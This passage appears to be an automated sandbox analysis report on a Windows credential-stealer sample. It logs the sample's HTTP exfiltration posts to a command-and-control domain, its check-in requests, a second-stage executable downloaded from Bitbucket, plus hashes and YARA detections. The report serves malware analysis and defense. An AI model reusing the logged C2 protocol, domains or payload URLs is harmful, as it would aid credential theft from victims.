                                                                                                                                                        Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                                                                                                        Cache-Control: no-store, no-cache, must-revalidate
                                                                                                                                                        Pragma: no-cache
                                                                                                                                                        X-Frame-Options: DENY
                                                                                                                                                        X-Content-Type-Options: nosniff
                                                                                                                                                        X-XSS-Protection: 1; mode=block
                                                                                                                                                        cf-cache-status: DYNAMIC
                                                                                                                                                        vary: accept-encoding
                                                                                                                                                        Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=DPsGZlad7TXJegQWb%2FWGEC6M2LdDQVqLX33m0w9K7%2FuENltG5%2BYHK4U%2BnXXxBNc9gUUxFpHzawMEL2mXvdLJfDQHu1BHF%2BOJD1SxGAkrpt4jmMkZ18UMAEDjG9csxndN5b0%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                        NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                        Server: cloudflare
                                                                                                                                                        CF-RAY: 8f66953689de4232-EWR
                                                                                                                                                        alt-svc: h3=":443"; ma=86400
                                                                                                                                                        server-timing: cfL4;desc="?proto=TCP&rtt=1623&min_rtt=1623&rtt_var=610&sent=7&recv=8&lost=0&retrans=0&sent_bytes=2836&recv_bytes=2079&delivery_rate=1793611&cwnd=214&unsent_bytes=0&cid=a1d7c046cb66f195&ts=981&x=0"
2024-12-23 07:19:21 UTC | 20 | IN | Data Raw: 66 0d 0a 6f 6b 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 0d 0a
Data Ascii: f ok 8.46.123.189
2024-12-23 07:19:21 UTC | 5 | IN | Data Raw: 30 0d 0a 0d 0a
Data Ascii: 0


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
6 | 192.168.2.7 | 49747 | 104.21.32.96 | 443 | 7624 | C:\Users\user\Desktop\LP4a6BowQN.exe
Timestamp | Bytes transferred | Direction | Data
2024-12-23 07:19:23 UTC | 272 | OUT | POST /api HTTP/1.1
                                                                                                                                                        Connection: Keep-Alive
                                                                                                                                                        Content-Type: multipart/form-data; boundary=FDXL9U82
                                                                                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                                                                                                                        Content-Length: 550856
                                                                                                                                                        Host: cuddlyready.xyz
2024-12-23 07:19:23 UTC | 15331 | OUT | Data Raw: 2d 2d 46 44 58 4c 39 55 38 32 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 41 38 36 32 33 34 45 33 45 38 37 46 35 45 35 43 41 43 38 39 32 33 38 35 30 33 30 35 44 31 33 45 0d 0a 2d 2d 46 44 58 4c 39 55 38 32 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 70 69 64 22 0d 0a 0d 0a 31 0d 0a 2d 2d 46 44 58 4c 39 55 38 32 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6c 69 64 22 0d 0a 0d 0a 4c 4f 47 53 31 31 2d 2d 4c 69 76 65 54 72 61 66 66 69 63 0d 0a 2d 2d 46 44 58 4c 39 55 38 32 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69
Data Ascii: --FDXL9U82Content-Disposition: form-data; name="hwid"A86234E3E87F5E5CAC8923850305D13E--FDXL9U82Content-Disposition: form-data; name="pid"1--FDXL9U82Content-Disposition: form-data; name="lid"LOGS11--LiveTraffic--FDXL9U82Content-Di
2024-12-23 07:19:28 UTC | 1128 | IN | HTTP/1.1 200 OK
                                                                                                                                                        Date: Mon, 23 Dec 2024 07:19:28 GMT
                                                                                                                                                        Content-Type: text/html; charset=UTF-8
                                                                                                                                                        Transfer-Encoding: chunked
                                                                                                                                                        Connection: close
                                                                                                                                                        Set-Cookie: PHPSESSID=pt9vo2igdgokuefusggdodil8t; expires=Fri, 18 Apr 2025 01:06:04 GMT; Max-Age=9999999; path=/
                                                                                                                                                        Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                                                                                                        Cache-Control: no-store, no-cache, must-revalidate
                                                                                                                                                        Pragma: no-cache
                                                                                                                                                        X-Frame-Options: DENY
                                                                                                                                                        X-Content-Type-Options: nosniff
                                                                                                                                                        X-XSS-Protection: 1; mode=block
                                                                                                                                                        cf-cache-status: DYNAMIC
                                                                                                                                                        vary: accept-encoding
                                                                                                                                                        Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=P49Urjn1%2Bsnln6WV4ioDspL1zcop%2F3HyihJN06SVsjMeZAI8D673asdUzl7LBxueEqXQEXtIq7RX5bwCJ1p5kUHfgr3aaUmIsICOVbYTk3crmhFMufSDVvx8NKYMI9iwp0E%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                        NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                        Server: cloudflare
                                                                                                                                                        CF-RAY: 8f669546fd11159b-EWR
                                                                                                                                                        alt-svc: h3=":443"; ma=86400
                                                                                                                                                        server-timing: cfL4;desc="?proto=TCP&rtt=1605&min_rtt=1601&rtt_var=608&sent=332&recv=574&lost=0&retrans=0&sent_bytes=2835&recv_bytes=553326&delivery_rate=1788120&cwnd=32&unsent_bytes=0&cid=df2eafc3f9f9d920&ts=4691&x=0"


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
7 | 192.168.2.7 | 49758 | 104.21.32.96 | 443 | 7624 | C:\Users\user\Desktop\LP4a6BowQN.exe
Timestamp | Bytes transferred | Direction | Data
2024-12-23 07:19:29 UTC | 263 | OUT | POST /api HTTP/1.1
                                                                                                                                                        Connection: Keep-Alive
                                                                                                                                                        Content-Type: application/x-www-form-urlencoded
                                                                                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                                                                                                                        Content-Length: 88
                                                                                                                                                        Host: cuddlyready.xyz
2024-12-23 07:19:29 UTC | 88 | OUT | Data Raw: 61 63 74 3d 67 65 74 5f 6d 65 73 73 61 67 65 26 76 65 72 3d 34 2e 30 26 6c 69 64 3d 4c 4f 47 53 31 31 2d 2d 4c 69 76 65 54 72 61 66 66 69 63 26 6a 3d 26 68 77 69 64 3d 41 38 36 32 33 34 45 33 45 38 37 46 35 45 35 43 41 43 38 39 32 33 38 35 30 33 30 35 44 31 33 45
Data Ascii: act=get_message&ver=4.0&lid=LOGS11--LiveTraffic&j=&hwid=A86234E3E87F5E5CAC8923850305D13E
2024-12-23 07:19:30 UTC | 1129 | IN | HTTP/1.1 200 OK
                                                                                                                                                        Date: Mon, 23 Dec 2024 07:19:30 GMT
                                                                                                                                                        Content-Type: text/html; charset=UTF-8
                                                                                                                                                        Transfer-Encoding: chunked
                                                                                                                                                        Connection: close
                                                                                                                                                        Set-Cookie: PHPSESSID=ahos70bhasobcoam7es51k8ijn; expires=Fri, 18 Apr 2025 01:06:09 GMT; Max-Age=9999999; path=/
                                                                                                                                                        Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                                                                                                        Cache-Control: no-store, no-cache, must-revalidate
                                                                                                                                                        Pragma: no-cache
                                                                                                                                                        X-Frame-Options: DENY
                                                                                                                                                        X-Content-Type-Options: nosniff
                                                                                                                                                        X-XSS-Protection: 1; mode=block
                                                                                                                                                        cf-cache-status: DYNAMIC
                                                                                                                                                        vary: accept-encoding
                                                                                                                                                        Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=akVs6JrIaqpHFr0qzvG0Em7bfIUZ18BJeM%2B4eJpxzdypUu%2BGWIf4ppihFF8BFB4FgSy6vUpyUT%2FQnKhNTmg%2BbLl0Sz%2FAsXHY%2Bn8qrrY4ZXnLUQWbmhhPccD3SnyH8CrBSBg%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                        NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                        Server: cloudflare
                                                                                                                                                        CF-RAY: 8f66956cac520f3d-EWR
                                                                                                                                                        alt-svc: h3=":443"; ma=86400
                                                                                                                                                        server-timing: cfL4;desc="?proto=TCP&rtt=1659&min_rtt=1646&rtt_var=643&sent=5&recv=7&lost=0&retrans=0&sent_bytes=2836&recv_bytes=987&delivery_rate=1666666&cwnd=131&unsent_bytes=0&cid=c7f7430c49d7302e&ts=774&x=0"
2024-12-23 07:19:30 UTC | 198 | IN | Data Raw: 63 30 0d 0a 57 46 6d 6e 42 2b 32 65 43 45 45 41 4a 4d 6f 77 4e 46 52 32 51 52 30 63 66 54 6a 43 47 68 32 42 45 42 33 78 49 32 6d 42 53 46 59 44 49 6f 56 79 7a 36 51 71 4b 58 52 51 75 6b 4d 4f 43 46 6b 64 4d 6e 34 55 54 4b 42 76 66 75 70 31 61 64 39 4d 47 2b 59 55 65 54 55 67 79 57 4b 61 36 57 63 7a 61 31 65 36 55 56 63 78 52 33 4d 75 4c 30 77 4b 6e 6a 56 75 34 6e 35 35 72 51 77 4e 37 6a 38 34 4e 44 62 47 59 35 37 43 4a 77 64 76 56 71 64 52 51 43 41 66 4c 33 70 66 46 56 6d 77 63 32 6e 67 63 6e 47 55 44 51 7a 35 4c 58 52 30 65 38 46 7a 7a 36 51 34 62 53 4a 42 36 41 6f 46 4b 53 73 3d 0d 0a
Data Ascii: c0WFmnB+2eCEEAJMowNFR2QR0cfTjCGh2BEB3xI2mBSFYDIoVyz6QqKXRQukMOCFkdMn4UTKBvfup1ad9MG+YUeTUgyWKa6Wcza1e6UVcxR3MuL0wKnjVu4n55rQwN7j84NDbGY57CJwdvVqdRQCAfL3pfFVmwc2ngcnGUDQz5LXR0e8Fzz6Q4bSJB6AoFKSs=
2024-12-23 07:19:30 UTC | 5 | IN | Data Raw: 30 0d 0a 0d 0a
Data Ascii: 0


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
8 | 192.168.2.7 | 49764 | 185.166.143.49 | 443 | 7624 | C:\Users\user\Desktop\LP4a6BowQN.exe
Timestamp | Bytes transferred | Direction | Data
2024-12-23 07:19:32 UTC | 248 | OUT | GET /mynewworkspace123312/scnd/downloads/FormattingCharitable.exe HTTP/1.1
                                                                                                                                                        Connection: Keep-Alive
                                                                                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                                                                                                                        Host: bitbucket.org
2024-12-23 07:19:32 UTC | 5939 | IN | HTTP/1.1 302 Found
                                                                                                                                                        Date: Mon, 23 Dec 2024 07:19:32 GMT
                                                                                                                                                        Content-Type: text/html; charset=utf-8
                                                                                                                                                        Content-Length: 0
                                                                                                                                                        Server: AtlassianEdge
                                                                                                                                                        Location: https://bbuseruploads.s3.amazonaws.com/70e84e0b-e14f-45c5-ab65-07760e9609fc/downloads/eaef3307-3cc1-464c-9988-4c3c4d541130/FormattingCharitable.exe?response-content-disposition=attachment%3B%20filename%3D%22FormattingCharitable.exe%22&AWSAccessKeyId=ASIA6KOSE3BNIFBW6TYB&Signature=PelXt66tJz%2FulrB0cB0%2BaL7%2Bi5E%3D&x-amz-security-token=IQoJb3JpZ2luX2VjEAgaCXVzLWVhc3QtMSJHMEUCIQD%2BsOmmZbJoeqQMRgcbUIKewsPYW2aBXNNdnqSZnOjDFwIgR8XEHN13jTNswyI0HHU0LSuyGD%2FTMiS45XjOxzfx2bUqsAII0P%2F%2F%2F%2F%2F%2F%2F%2F%2F%2FARAAGgw5ODQ1MjUxMDExNDYiDKLERm7AyKJmGnsaryqEAiz2RQWxEcCBLMIfVp3H4PSzeOX5Dz20ShaLz%2BgE9TIlAJRJj3b2E09svKzFkLddqGwYqC2K%2FKIH%2B43EpJ156iF0t0YnErOxg3PyYWT2PSMugnEx4xgVbJpkrwOS%2BaXe%2FSsC4UOf%2F83UoqmwNPRhKyzztbcDpxLcWerZy9Q6aovVLfMedeL2%2BzfXvbpi8S9915xhF0Cpozy3i0jpnDfou%2FWMrbGZX8d8kbOTHT2AOnqFdwajWkRe0yZY7VqHnS4UnUUU2gtvmzbAh%2B9Byjxps3Oa32XIPpDohq%2Fsd63Twd%2FTpUBNqNyZ3%2BxCnHgqoVCvvdq8kFyXYiW9CTBL2KWz0BWyfxXEMIaYpLsGOp0BYb7jWXl2rvZ6kkWiTN4Lg4p1xTsXw8YInPWUnYT2zjLbcrffJNmSPBWt8S40YM7x5zFblDt5Ez5 [TRUNCATED]
                                                                                                                                                        Expires: Mon, 23 Dec 2024 07:19:32 GMT
                                                                                                                                                        Cache-Control: max-age=0, no-cache, no-store, must-revalidate, private
                                                                                                                                                        X-Used-Mesh: False
                                                                                                                                                        Vary: Accept-Language, Origin
                                                                                                                                                        Content-Language: en
                                                                                                                                                        X-View-Name: bitbucket.apps.downloads.views.download_file
                                                                                                                                                        X-Dc-Location: Micros-3
                                                                                                                                                        X-Served-By: 66c94ffc68ae
                                                                                                                                                        X-Version: c9b3998323c0
                                                                                                                                                        X-Static-Version: c9b3998323c0
                                                                                                                                                        X-Request-Count: 248
                                                                                                                                                        X-Render-Time: 0.05292677879333496
                                                                                                                                                        X-B3-Traceid: ecd3417aa53640c3a9959b3f7c78f82c
                                                                                                                                                        X-B3-Spanid: a7ea579411d4b7e8
                                                                                                                                                        X-Frame-Options: SAMEORIGIN
                                                                                                                                                        Content-Security-Policy: connect-src bitbucket.org *.bitbucket.org bb-inf.net *.bb-inf.net atlassianblog.wpengine.com id.atlassian.com api.atlassian.com api.stg.atlassian.com wss://bitbucketci-ws-service.services.atlassian.com/ wss://bitbucketci-ws-service.stg.services.atlassian.com/ wss://bitbucketci-ws-service.dev.services.atlassian.com/ analytics.atlassian.com atlassian-cookies--categories.us-east-1.prod.public.atl-paas.net as.atlassian.com api-private.stg.atlassian.com api-private.atlassian.com xp.atlassian.com atl-global.atlassian.com cofs.staging.public.atl-paas.net cofs.prod.public.atl-paas.net fd-assets.prod.atl-paas.net flight-deck-assets-bifrost.prod-east.frontend.public.atl-paas.net intake.opbeat.com api.media.atlassian.com api.segment.io xid.statuspage.io xid.atlassian.com xid.sourcetreeapp.com bam.nr-data.net bam-cell.nr-data.net www.google-analytics.com sentry.io *.ingest.sentry.io statsigapi.net fd-config.us-east-1.prod.public.atl-paas.net fd-config-bifrost.prod-east.frontend.public.atl-paas.ne [TRUNCATED]
                                                                                                                                                        X-Usage-Quota-Remaining: 999105.459
                                                                                                                                                        X-Usage-Request-Cost: 909.53
                                                                                                                                                        X-Usage-User-Time: 0.025410
                                                                                                                                                        X-Usage-System-Time: 0.001876
                                                                                                                                                        X-Usage-Input-Ops: 0
                                                                                                                                                        X-Usage-Output-Ops: 0
                                                                                                                                                        Age: 0
                                                                                                                                                        X-Cache: MISS
                                                                                                                                                        X-Content-Type-Options: nosniff
                                                                                                                                                        X-Xss-Protection: 1; mode=block
                                                                                                                                                        Atl-Traceid: ecd3417aa53640c3a9959b3f7c78f82c
                                                                                                                                                        Atl-Request-Id: ecd3417a-a536-40c3-a995-9b3f7c78f82c
                                                                                                                                                        Strict-Transport-Security: max-age=63072000; includeSubDomains; preload
                                                                                                                                                        Report-To: {"endpoints": [{"url": "https://dz8aopenkvv6s.cloudfront.net"}], "group": "endpoint-1", "include_subdomains": true, "max_age": 600}
                                                                                                                                                        Nel: {"failure_fraction": 0.001, "include_subdomains": true, "max_age": 600, "report_to": "endpoint-1"}
                                                                                                                                                        Server-Timing: atl-edge;dur=163,atl-edge-internal;dur=4,atl-edge-upstream;dur=161,atl-edge-pop;desc="aws-eu-central-1"
                                                                                                                                                        Connection: close


Session ID  Source IP    Source Port  Destination IP  Destination Port  PID   Process
9           192.168.2.7  49775        16.182.101.249  443               7624  C:\Users\user\Desktop\LP4a6BowQN.exe
Timestamp                Bytes transferred  Direction  Data
2024-12-23 07:19:34 UTC  1348               OUT        GET /70e84e0b-e14f-45c5-ab65-07760e9609fc/downloads/eaef3307-3cc1-464c-9988-4c3c4d541130/FormattingCharitable.exe?response-content-disposition=attachment%3B%20filename%3D%22FormattingCharitable.exe%22&AWSAccessKeyId=ASIA6KOSE3BNIFBW6TYB&Signature=PelXt66tJz%2FulrB0cB0%2BaL7%2Bi5E%3D&x-amz-security-token=IQoJb3JpZ2luX2VjEAgaCXVzLWVhc3QtMSJHMEUCIQD%2BsOmmZbJoeqQMRgcbUIKewsPYW2aBXNNdnqSZnOjDFwIgR8XEHN13jTNswyI0HHU0LSuyGD%2FTMiS45XjOxzfx2bUqsAII0P%2F%2F%2F%2F%2F%2F%2F%2F%2F%2FARAAGgw5ODQ1MjUxMDExNDYiDKLERm7AyKJmGnsaryqEAiz2RQWxEcCBLMIfVp3H4PSzeOX5Dz20ShaLz%2BgE9TIlAJRJj3b2E09svKzFkLddqGwYqC2K%2FKIH%2B43EpJ156iF0t0YnErOxg3PyYWT2PSMugnEx4xgVbJpkrwOS%2BaXe%2FSsC4UOf%2F83UoqmwNPRhKyzztbcDpxLcWerZy9Q6aovVLfMedeL2%2BzfXvbpi8S9915xhF0Cpozy3i0jpnDfou%2FWMrbGZX8d8kbOTHT2AOnqFdwajWkRe0yZY7VqHnS4UnUUU2gtvmzbAh%2B9Byjxps3Oa32XIPpDohq%2Fsd63Twd%2FTpUBNqNyZ3%2BxCnHgqoVCvvdq8kFyXYiW9CTBL2KWz0BWyfxXEMIaYpLsGOp0BYb7jWXl2rvZ6kkWiTN4Lg4p1xTsXw8YInPWUnYT2zjLbcrffJNmSPBWt8S40YM7x5zFblDt5Ez56YqzuxoQvJUGtRwLyEvmWXdiFc4qnFdZ23f1PLTAyj9H [TRUNCATED]
Connection: Keep-Alive
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
Host: bbuseruploads.s3.amazonaws.com
2024-12-23 07:19:34 UTC  554                IN         HTTP/1.1 200 OK
x-amz-id-2: uLVZbKMk9xSeMDyGKv3AN6TYAjsilhoNlQadlUWvvzSmhHymV5e59MekN60suEl4OJ/K3qwKX2E=
x-amz-request-id: YQ6ZRZ8G94EY7ZC4
Date: Mon, 23 Dec 2024 07:19:35 GMT
Last-Modified: Sun, 22 Dec 2024 18:56:57 GMT
ETag: "73565a0bcdcb7ff5f9ce005a2530e215"
x-amz-server-side-encryption: AES256
x-amz-version-id: 7hbzHT1uhpKzZ7nBtmVCaxIrBpJnNbOS
Content-Disposition: attachment; filename="FormattingCharitable.exe"
Accept-Ranges: bytes
Content-Type: application/x-msdownload
Content-Length: 1325507
Server: AmazonS3
Connection: close

Target ID: 0
Start time: 02:18:59
Start date: 23/12/2024
Path: C:\Users\user\Desktop\LP4a6BowQN.exe
Wow64 process (32bit): true
Commandline: "C:\Users\user\Desktop\LP4a6BowQN.exe"
Imagebase: 0x7e0000
File size: 2'969'088 bytes
MD5 hash: 80429EC2B7C1A75BC06B68846EB8BE34
Has elevated privileges: true
Has administrator privileges: true
Programmed in: C, C++ or other language
Yara matches:
• Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000000.00000003.1519966217.0000000000BA3000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
• Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000000.00000003.1479177875.0000000000BA3000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
Reputation: low
Has exited: true

Target ID: 6
Start time: 04:17:42
Start date: 23/12/2024
Path: C:\Windows\SysWOW64\WerFault.exe
Wow64 process (32bit): true
Commandline: C:\Windows\SysWOW64\WerFault.exe -u -p 7624 -s 1948
Imagebase: 0x120000
File size: 483'680 bytes
MD5 hash: C31336C1EFC2CCB44B4326EA793040F2
Has elevated privileges: true
Has administrator privileges: true
Programmed in: C, C++ or other language
Reputation: high
Has exited: true

No disassembly